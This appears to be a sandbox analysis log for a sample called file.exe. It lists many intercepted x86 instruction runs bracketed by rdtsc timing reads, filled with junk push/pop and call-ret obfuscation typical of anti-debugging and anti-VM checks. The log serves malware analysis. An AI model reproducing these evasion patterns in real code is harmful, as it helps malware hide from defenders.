Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E21AC second address: 13E2235 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, esi 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push esi 0x00000014 or di, B47Ah 0x00000019 pop edi 0x0000001a movzx edi, cx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 xor di, B397h 0x00000029 mov eax, dword ptr [ebp+122D0789h] 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F1D94C8C5B8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 mov ebx, 5492C9FBh 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push ebp 0x00000053 call 00007F1D94C8C5B8h 0x00000058 pop ebp 0x00000059 mov dword ptr [esp+04h], ebp 0x0000005d add dword ptr [esp+04h], 0000001Dh 0x00000065 inc ebp 0x00000066 push ebp 0x00000067 ret 0x00000068 pop ebp 0x00000069 ret 0x0000006a nop 0x0000006b jl 00007F1D94C8C5C0h 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 popad 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E2235 second address: 13E2240 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E70AE second address: 13E70B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E6253 second address: 13E62E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 jmp 00007F1D94F8162Dh 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F1D94F81628h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov edi, dword ptr [ebp+122D29B8h] 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c jp 00007F1D94F81632h 0x00000042 mov eax, dword ptr [ebp+122D055Dh] 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007F1D94F81628h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 0000001Ah 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 push FFFFFFFFh 0x00000064 mov dword ptr [ebp+122D28DFh], ebx 0x0000006a nop 0x0000006b push eax 0x0000006c push edx 0x0000006d push edi 0x0000006e push edi 0x0000006f pop edi 0x00000070 pop edi 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E62E7 second address: 13E62EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E62EE second address: 13E62FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E62FC second address: 13E6302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E7246 second address: 13E724C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E3337 second address: 13E333C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E333C second address: 13E3342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E3342 second address: 13E3346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA280 second address: 13EA286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F2101 second address: 13F2107 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F2107 second address: 13F2125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007F1D94F81626h 0x0000000f jbe 00007F1D94F81626h 0x00000015 popad 0x00000016 jl 00007F1D94F8162Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F2125 second address: 13F212C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F212C second address: 13F2150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94F81638h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13942BA second address: 13942C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13942C1 second address: 13942D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1D94F8162Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13942D3 second address: 13942D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F1A42 second address: 13F1A52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F1A52 second address: 13F1A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F1CEA second address: 13F1CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F3A91 second address: 13F3A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F3A99 second address: 13F3AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jne 00007F1D94F81626h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FA501 second address: 13FA505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FF5C2 second address: 13FF5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94F8162Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FF5D3 second address: 13FF5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F1D94C8C5C7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FF5F6 second address: 13FF611 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F1D94F81633h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE2E9 second address: 13FE2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE2F0 second address: 13FE2FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F1D94F81626h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE9EA second address: 13FE9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE9EE second address: 13FEA02 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1D94F81626h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F1D94F81636h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FEA02 second address: 13FEA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94C8C5BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FEA10 second address: 13FEA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FECEB second address: 13FECF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FECF3 second address: 13FED00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F1D94F8162Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FEE86 second address: 13FEEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1D94C8C5B6h 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c jp 00007F1D94C8C5B6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 pushad 0x00000017 jmp 00007F1D94C8C5C0h 0x0000001c push eax 0x0000001d jng 00007F1D94C8C5B6h 0x00000023 pushad 0x00000024 popad 0x00000025 pop eax 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 jmp 00007F1D94C8C5BCh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FEEC8 second address: 13FEECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1390C99 second address: 1390C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1390C9F second address: 1390CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1390CA6 second address: 1390CEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F1D94C8C5BAh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop esi 0x0000000b jmp 00007F1D94C8C5C0h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f jmp 00007F1D94C8C5C5h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1390CEA second address: 1390CF7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1D94F81626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CF58D second address: 13CF591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CF591 second address: 13CF597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CF597 second address: 13B9022 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1D94C8C5B8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor dword ptr [ebp+122D352Ch], ebx 0x00000015 call dword ptr [ebp+122D20D2h] 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007F1D94C8C5B6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CFC3D second address: 13CFC41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CFC41 second address: 13CFC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CFC47 second address: 13CFC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D03FD second address: 13D0401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D0401 second address: 13D040F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F1D94F81626h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D040F second address: 13D0434 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F1D94C8C5C8h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D0434 second address: 13D0439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D0523 second address: 13D052E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F1D94C8C5B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D0700 second address: 13D072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push eax 0x00000007 push ecx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop ecx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1D94F81637h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D072A second address: 13D073A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D073A second address: 13D0740 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D0740 second address: 13D0759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D07E3 second address: 13B9B6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F81636h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F1D94F81628h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 xor dword ptr [ebp+12487F3Fh], edi 0x0000002c lea eax, dword ptr [ebp+124932F7h] 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F1D94F81628h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c mov edx, dword ptr [ebp+122D29F1h] 0x00000052 and edi, 4C88E283h 0x00000058 nop 0x00000059 jne 00007F1D94F81634h 0x0000005f push eax 0x00000060 ja 00007F1D94F8163Ah 0x00000066 nop 0x00000067 lea eax, dword ptr [ebp+124932B3h] 0x0000006d mov edi, esi 0x0000006f push eax 0x00000070 jmp 00007F1D94F81637h 0x00000075 mov dword ptr [esp], eax 0x00000078 call 00007F1D94F8162Dh 0x0000007d mov ch, bh 0x0000007f pop edi 0x00000080 call dword ptr [ebp+124610E3h] 0x00000086 pushad 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007F1D94F81634h 0x0000008e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B9B6F second address: 13B9B97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F1D94C8C5B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1D94C8C5C8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1403F7A second address: 1403F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F1D94F81626h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1403F8C second address: 1403F9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1404205 second address: 140421D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1D94F81630h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1408C7F second address: 1408C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1D94C8C5BCh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1408C93 second address: 1408CA0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F1D94F81626h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14128A7 second address: 14128AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14128AB second address: 14128B5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1D94F81626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14128B5 second address: 14128BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14128BB second address: 14128BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14116CC second address: 14116D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1411800 second address: 1411819 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnp 00007F1D94F81626h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F1D94F81636h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141133C second address: 1411373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94C8C5C9h 0x00000009 pop ebx 0x0000000a jmp 00007F1D94C8C5C9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1416D17 second address: 1416D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1D94F8162Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1416D29 second address: 1416D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F1D94C8C5B6h 0x0000000a jng 00007F1D94C8C5B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1416D39 second address: 1416D54 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1D94F81626h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1D94F8162Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1416E75 second address: 1416E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1D94C8C5B6h 0x0000000a jmp 00007F1D94C8C5BEh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1416E92 second address: 1416E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1417682 second address: 141769E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C7h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141769E second address: 14176A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14176A4 second address: 14176AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1416A0D second address: 1416A69 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1D94F81626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F1D94F8163Ah 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F1D94F81632h 0x00000017 js 00007F1D94F8163Eh 0x0000001d jmp 00007F1D94F81636h 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F1D94F81636h 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138BBA5 second address: 138BBC7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1D94C8C5B6h 0x00000008 jmp 00007F1D94C8C5C0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F1D94C8C5B6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138BBC7 second address: 138BBCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141B011 second address: 141B017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141B017 second address: 141B01D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
